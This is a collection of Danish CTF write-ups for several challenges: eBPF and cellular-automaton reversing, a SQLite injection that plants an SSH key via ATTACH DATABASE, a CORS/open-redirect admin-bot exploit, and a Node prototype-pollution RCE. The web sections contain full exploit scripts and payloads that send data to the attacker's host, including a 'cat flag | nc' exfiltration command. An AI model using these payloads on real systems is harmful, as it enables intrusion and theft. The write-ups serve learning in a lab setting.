Løsning: Vi får en stripped ELF. strace afslører at binæren loader eBPF-programmer og så spinner i et clock_nanosleep loop, flag-checking logikken er altså slet ikke i userspace, men lever inde i BPF-program.
Binæren indeholder et embedded BPF ELF-objekt som jeg ekstraktede ved at søge efter ELF magic bytes (\x7fELF) efter position 4:
1
2
3
4
5
6
|
python3 -c "
data = open('reactor','rb').read()
idx = data.index(b'\x7fELF', 4)
open('bpf_clean.o','wb').write(data[idx:idx+0xb000])
"
llvm-objdump -d bpf_clean.o > bpf_disasm.txt
|
Arkitekturen er en custom stack-based VM ovenpå Linux eBPF. Hver clock_nanosleep syscall er et “VM tick”, en BPF handler avancerer program counteren og loader næste instruktion i et PENDING_OPS map, en anden dispatcher til den rigtige opcode-handler via tail-calls. VM-bytecoden sidder i et BPF map med 308 u16 words, og de 23 encoded target-bytes sidder i mem[253:276].
Transformationen per tegn er:
$$\text{encoded}[b] = \bigl((\text{char} + 48) \mathbin{\&} 255\bigr) \oplus \bigl(((b \times 8) - 48) \mathbin{\&} 255\bigr)$$Inverteret:
$$\text{char} = \Bigl(\text{encoded}[b] \oplus \bigl(((b \times 8) - 48) \mathbin{\&} 255\bigr)\Bigr) - 48$$
1
2
3
4
5
6
7
8
9
10
11
12
|
encoded = [
0xa4, 0xac, 0x93, 0x43, 0x69, 0x7c, 0x8f, 0xaa,
0xb5, 0x86, 0x8a, 0xa7, 0x51, 0xa6, 0xcf, 0xdc,
0xc1, 0xd7, 0xf3, 0x08, 0xd2, 0x1b, 0x2d
]
flag = ""
for b in range(23):
key = ((b * 8) - 48) & 0xff
flag += chr((encoded[b] ^ key) - 48)
print(flag) # DDC{iT_runz_1n_da_c0r3}
|
Flag: DDC{iT_runz_1n_da_c0r3}
Mitosis (Reverse Engineering)
A program that evolves?
Vedhæftet fil: rev_mitosis.zip
Løsning: Vi får en stripped 64-bit ELF. Binæren læser en linje fra stdin, kører en transformation på inputtet og sammenligner resultatet med en hardcoded target i .rodata via memcmp. Mit første instinkt var at NOP’e jne efter memcmp og brute force mig til flaget, men det virkede ikke da transformationen ikke er reversibel på den måde.
Transformationen viser sig at være et cellular automaton der kører 20 generationer på input-bufferen, deraf challenge-navnet og den voldsomme størrelse på .text sektionen (~38.000 linjer disassembly i Binary Ninja). Hver generation læser bits fra nabobyttes og flipper bits baseret på compile-time konstanter.
Target-bytes sidder på file offset 0x1d018 (50 bytes). Nøgletricket er at CA’en er deterministisk, giver man binæren target som input, transformerer den det, og resultatet ved memcmp er netop flaget. Jeg brugte GDB til at sætte et breakpoint på memcmp og læse rdi:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
import subprocess
import struct
import os
import sys
BINARY = os.path.join(os.path.dirname(__file__), 'mitosis')
# 50-byte target fra .rodata -> offset 0x1d018
TARGET = bytes.fromhex(
'541113dbfc36253ecf4c4e3038d8cd25'
'3230d7eb26383efdce21321fcbdf6530'
'37c9d6601a39f0e323351d74cb693033'
'abfd'
)
GDB_SCRIPT = r"""
import gdb
class MemcmpBP(gdb.Breakpoint):
def stop(self):
rdi = int(gdb.parse_and_eval("$rdi"))
rdx = int(gdb.parse_and_eval("$rdx"))
buf = bytes(gdb.selected_inferior().read_memory(rdi, rdx))
with open('/tmp/_mitosis_flag.bin', 'wb') as f:
f.write(buf)
return False
gdb.execute("set disable-randomization on")
gdb.execute("set debuginfod enabled off")
MemcmpBP("memcmp@plt")
gdb.execute("run < /tmp/_mitosis_input.bin")
gdb.execute("quit")
"""
def main():
with open('/tmp/_mitosis_input.bin', 'wb') as f:
f.write(TARGET + b'\n')
with open('/tmp/_mitosis_hook.py', 'w') as f:
f.write(GDB_SCRIPT)
subprocess.run(
['gdb', '-q', '-batch', '-x', '/tmp/_mitosis_hook.py', BINARY],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
with open('/tmp/_mitosis_flag.bin', 'rb') as f:
flag = f.read()
print(f"Flag: {flag.decode()}")
if __name__ == '__main__':
main()
|
Efter at have kørt dette script, får vi flaget:
1
2
|
$ python3 solve.py
Flag: DDC{travel_through_c3llul4r_aut0mata_space_time!!}
|
Flag: DDC{travel_through_c3llul4r_aut0mata_space_time!!}
Squeaky Clean 1 (Boot 2 Root)
I made this challenge. It aint much, but it’s honest work. Fewer features, fewer unintendeds!
That’s what I call a clean challenge!
Løsning: Siden er en simpel admin login-side. Efter at have prøvet nogle simple SQLi payloads fandt jeg hurtigt ud af at databasen er SQLite, og at den har en users tabel med én bruger:
1
2
3
4
5
6
7
8
9
10
|
sqlmap -u "http://squeaky-clean.cfire/" --method POST --data "username=admin&password=a" --batch --risk=3 --level=5 -T users --dump
Database: <current>
Table: users
[1 entry]
+----+---------------------------------------+----------+
| id | password | username |
+----+---------------------------------------+----------+
| 1 | PasswordIsNotRelevantForThisChallenge | admin |
+----+---------------------------------------+----------+
|
Passwordet er som sagt ikke relevant. Login-formen kan bypasses med admin'-- som brugernavn, fordi backenden bygger SQL-forespørgslen med direkte string interpolation og kører den med executescript() hvilket er en funktion der tillader flere semikolon-separerede statements på en gang.
Dashboardet læser filer fra disk via ?file= uden nogen sanitering, hvilket betyder at vi altså kan traversere frit med ../. Jeg tjekkede hvem der kører appen og fandt .ssh mappen:
Der eksisterer allerede en authorized_keys fil med en SSH public key, men authorized_keys2 gør ikke. OpenSSH tjekker begge filer som standard.
Siden executescript() tillader flere SQL-statements, kan vi bruge ATTACH DATABASE til at få SQLite til at oprette en ny database-fil på en arbitrær sti. Løsningen er at putte vores egen SSH public key ind i /home/user/.ssh/authorized_keys2. SSH’s authorized_keys parser læser filen linje for linje og ignorerer linjer den ikke forstår, inklusiv SQLite’s binære header, så vi behøver bare at sørge for at vores public key havner på en ren linje.
Jeg genererede et nøglepar og sendte payloaden:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
import urllib.parse, urllib.request
pubkey = open('/tmp/b2rkey1.pub').read().strip()
payload = (
f"admin'; ATTACH DATABASE '/home/user/.ssh/authorized_keys2' AS ssh2; "
f"CREATE TABLE IF NOT EXISTS ssh2.a (b TEXT); "
f"INSERT INTO ssh2.a VALUES (char(10)||char(10)||'{pubkey}'||char(10)||char(10));--"
)
data = urllib.parse.urlencode({'username': payload, 'password': 'x'}).encode()
req = urllib.request.Request('http://squeaky-clean.cfire/', data=data)
urllib.request.urlopen(req, timeout=10)
# Svar: "SQL Error: near "AND": syntax error" ← forventet, skrivningerne er allerede committed
|
Serveren svarer med en SQL-fejl, men det er forventet, executescript har allerede committet vores statements. Jeg verificerede via LFI at filen faktisk eksisterer (man får en UTF-8 decode-fejl i stedet for “file not found”, fordi SQLite’s binære header er non-UTF-8).
Derefter SSH’ede jeg ind:
1
|
ssh -i /tmp/b2rkey1 user@squeaky-clean.cfire
|
I hjemmemappen lå en SUID-binary ejet af root:
1
2
3
4
5
|
user@f3b7e07b69c8:~$ ls -la
-rwSr-Sr-x 1 root root 793560 Feb 25 20:27 flag.bin
user@f3b7e07b69c8:~$ /home/user/flag.bin
DDC{Sql1te_To_Auth0riz3d?!}
|
Flag: DDC{Sql1te_To_Auth0riz3d?!}
Corsica (Web Exploitation)
Tired of snow? Bored of grey skies and cold rain? Then visit Corsica!
Løsning: En Flask/Gunicorn web-app. Challenget handler om at chaine tre bugs for at stjæle et flag fra admin-panelet via en admin bot. Jeg prøvede det klassiske, SQLi, SSTI, stored XSS, path traversal, intet. Det interssante er /tips-siden, der har en formular til at sende URLs til admin-bot’en, med en HTML-kommentar der afslører at serveren prepender https://localhost/ til vores input.
Bug 1, Open Redirect: GET /cookie_check?next=<url> redirecter til next uden validering, hvis cookie_consent=yes er sat som cookie. Admin-bot’en har den cookie, så man kan sende den derhen man vil:
1
|
/cookie_check?next=https://10.0.240.248:9443/exploit.html
|
Bug 2, CORS misconfiguration: Serveren reflekterer Origin-headeren direkte i Access-Control-Allow-Origin + Access-Control-Allow-Credentials: true, på alle endpoints, inkl. /admin. Det betyder at JavaScript fra en hvilken som helst origin kan lave credentialed fetch() til https://localhost og læse svaret.
Bug 3, One-time admin token: /admin viser et token der er gyldigt i 5 sekunder. Et POST til /retrieve_flag med det token returnerer flaget.
Admin-bot’en tilgår appen som localhost internt, session-cookies er sat til localhost, ikke corsica.cfire. Jeg opsatte en HTTPS-server med self-signed cert (HeadlessChrome ignorer det) og serverede en exploit-side der:
- fetcher
https://localhost/admin med credentials: "include", CORS tillader det og admin-cookies sendes med
- parser tokenet ud af HTML’en med regex
- POSTer til
https://localhost/retrieve_flag med tokenet inden for 5 sekunder
- exfiltrerer flag-HTML’en via open redirect til vores HTTP-server (window.location bruger redirectet som tunnel, direkte fetch til HTTP ville blive blokeret som mixed-content)
1
2
3
4
5
6
7
8
9
10
|
const adminHtml = await fetch("https://localhost/admin", { credentials: "include" }).then(r => r.text());
const token = adminHtml.match(/name="token"\s+value="([^"]+)"/)[1];
const flagHtml = await fetch("https://localhost/retrieve_flag", {
method: "POST", credentials: "include",
headers: { "Content-Type": "application/x-www-form-urlencoded" },
body: "token=" + encodeURIComponent(token)
}).then(r => r.text());
const b64 = btoa(unescape(encodeURIComponent(flagHtml)));
window.location = "https://localhost/cookie_check?next=http://10.0.240.248:9999/flag?d=" + encodeURIComponent(b64);
|
Triggeret ved at sende bot’en til /cookie_check?next=https://10.0.240.248:9443/exploit.html. Open redirect bruges altså to gange, først til at levere exploitet, dernæst som exfiltrations-tunnel.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
|
import requests, urllib3, time, re, html, os, base64, json, subprocess, ssl
import http.server, threading
from urllib.parse import urlparse, parse_qs, unquote, quote
urllib3.disable_warnings()
TARGET = "https://corsica.cfire"
OUR_IP = "10.0.240.248"
HTTP_PORT = 9999
HTTPS_PORT = 9443
OUR_UUID = "c103c4dd71d14d548b26b06a89bddd6d" #make a account
SESSION = "eyJ1c2VybmFtZSI6InRlc3R1c2VyMTIzIn0.aaio0A.bpirzQCXbooQ0WWHEb4_RMt7ht0" #make a account
EXPLOIT_HTML = open("exploit.html", "rb").read()
received = []
class Handler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
parsed = urlparse(self.path)
params = parse_qs(parsed.query)
info = {
"path": self.path, "from": str(self.client_address),
"ua": self.headers.get("User-Agent",""),
"cookie": self.headers.get("Cookie",""),
}
received.append(info)
if parsed.path == "/flag":
if "d" in params:
try:
decoded = base64.b64decode(params["d"][0] + "==").decode("utf-8", errors="replace")
print(f"\n{'!'*50}\ngoldklumpen:\n{'!'*50}")
flags = re.findall(r'DDC\{[^}]+\}', decoded, re.I)
if flags:
print(f"FLAG: {flags}")
with open("/tmp/flag_data2.html", "w") as f:
f.write(decoded)
except Exception as e:
print(f"Decode error: {e}, raw: {params['d'][0][:200]}")
self.send_response(200); self.end_headers(); self.wfile.write(b"ok"); return
if parsed.path == "/error":
err = unquote(params.get("e", [""])[0])
self.send_response(200); self.end_headers(); self.wfile.write(b"ok"); return
if parsed.path == "/exploit.html":
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", str(len(EXPLOIT_HTML)))
self.end_headers()
self.wfile.write(EXPLOIT_HTML); return
self.send_response(200); self.end_headers(); self.wfile.write(b"ok")
def log_message(self, *a): pass
os.system(
"openssl req -x509 -newkey rsa:2048 -keyout /tmp/ctf_key.pem -out /tmp/ctf_cert.pem "
"-days 1 -nodes -subj '/CN=10.0.240.248' "
"-addext 'subjectAltName=IP:10.0.240.248' 2>/dev/null"
)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("/tmp/ctf_cert.pem", "/tmp/ctf_key.pem")
https_server = http.server.HTTPServer(("0.0.0.0", HTTPS_PORT), Handler)
https_server.socket = ctx.wrap_socket(https_server.socket, server_side=True)
t_https = threading.Thread(target=https_server.serve_forever, daemon=True)
t_https.start()
s = requests.Session()
s.verify = False
s.cookies.set("session", SESSION)
s.cookies.set("cookie_consent", "yes")
os.remove("/tmp/flag_data.html") if os.path.exists("/tmp/flag_data.html") else None
s.post(f"{TARGET}/profile/{OUR_UUID}", data={"bio": "WAITING_FOR_HTTPS_EXPLOIT"})
exploit_url = f"https://{OUR_IP}:{HTTPS_PORT}/exploit.html"
redirect_path = f"/cookie_check?next={exploit_url}"
ok = s.post(f"{TARGET}/request_admin",
data={"target_url": redirect_path, "desc": "check this"},
timeout=10)
for i in range(15):
time.sleep(1)
for r in received:
print(r)
r2 = s.get(f"{TARGET}/profile/{OUR_UUID}")
bio = re.search(r'<textarea[^>]*>(.*?)</textarea>', r2.text, re.DOTALL)
if bio:
bio_content = html.unescape(bio.group(1))
flags = re.findall(r'DDC\{[^}]+\}', bio_content, re.I)
if flags:
print(f"FLAG: {flags}")
for fname in ["/tmp/flag_data.html", "/tmp/flag_data2.html"]:
if os.path.exists(fname):
with open(fname) as f:
fc = f.read()
flags = re.findall(r'DDC\{[^}]+\}', fc, re.I)
if flags:
print(f"giga goldklumpen: {flags}")
|
Flag: DDC{c0rsic4_w3lcomes_y0u_w1th_0pen_arms}
Backup (Web Exploitation)
I’m just a simple backup service.
Vedhæftet fil: web_backup.zip
Løsning: Vi får en Node.js service der tager en JSON-config, merger den med defaults og til sidst kører spawn("echo", ["System OK"]).
Merge-funktionen blokerer __proto__, men ikke constructor.prototype. Derfor kan jeg prototype pollute Object.prototype via user input.
spawn-options indeholder kun {stdio, timeout}, så felter som shell og env bliver slået op via prototype-chainen. Jeg sætter derfor:
shell = "/proc/self/exe"env.NODE_OPTIONS = "--require /proc/self/environ"
Det gør at processen i praksis kører:
1
|
node --check "echo System OK"
|
men med en --require først.
Jeg kan ikke skrive filer, så i stedet loader jeg /proc/self/environ. Den indeholder environment variables (KEY=value\0...). Hvis første variabel er JavaScript payload der slutter med //, bliver resten af filen kommenteret ud, fordi NUL ikke er en JS line terminator.
Payloaden eksekverer så cat /app/flag.txt og sender flaget til min server via nc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
import sys, json, ssl, urllib.request
def exploit(target, host, port):
cmd = f"cat /app/flag.txt|nc {host} {port}"
payload = {
"constructor": {
"prototype": {
"shell": "/proc/self/exe",
"env": {
"_PAYLOAD": f"require('child_process').execSync('{cmd}')//" ,
"NODE_OPTIONS": "--require /proc/self/environ",
"PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"env": None,
"shell": None,
}
}
}
}
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
req = urllib.request.Request(
target.rstrip("/") + "/archive",
data=json.dumps(payload).encode(),
headers={"Content-Type": "application/json"},
method="POST",
)
with urllib.request.urlopen(req, context=ctx, timeout=15) as r:
print(json.loads(r.read()))
exploit(sys.argv[1], sys.argv[2], int(sys.argv[3]))
|
Flag: DDC{pr0t0type_p0llution_1s_ins4ne}
Speedrun (Cryptography)
Writeup mangler…
Stackless (Reverse Engineering)
Writeup mangler…
